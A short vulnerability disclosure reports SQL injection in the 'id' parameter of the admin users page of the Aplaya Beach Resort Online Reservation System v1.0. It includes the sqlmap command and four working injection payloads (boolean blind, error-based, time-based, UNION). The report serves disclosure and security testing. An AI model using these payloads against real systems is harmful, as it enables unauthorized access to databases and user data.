Vulnerability discovery author:Qianyongcun

Aplaya Beach Resort Online Reservation System - SQL Injection on(admin/mod_users/index.php?view=view&id=XX) 

Vendor Homepage:
https://www.sourcecodester.com/aplaya-beach-resort-online-reservation-system.html 

Version:V1.0
Tested on: PHP, Apache, MySQL

Affected Page:
admin/mod_users/index.php
On this page, id parameter is vulnerable to SQL Injection Attack 
Proof of vulnerability(Verify using the sqlmap tool after logining):

-> sqlmap -u http://localhost/aplaya/admin/mod_users/index.php?view=view&id=5 --batch
Output:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: view=view&id=(SELECT (CASE WHEN (7987=7987) THEN 5 ELSE (SELECT 4049 UNION SELECT 4230) END))

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: view=view&id=(SELECT 8895 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(8895=8895,1))),0x7170627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=view&id=5 AND (SELECT 3930 FROM (SELECT(SLEEP(5)))dvlm)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: view=view&id=-1531 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716b7a71,0x6c76745a77666264445862774449777276447561754f45507a755a697a50465955494b755245694c,0x7170627071)-- -
---

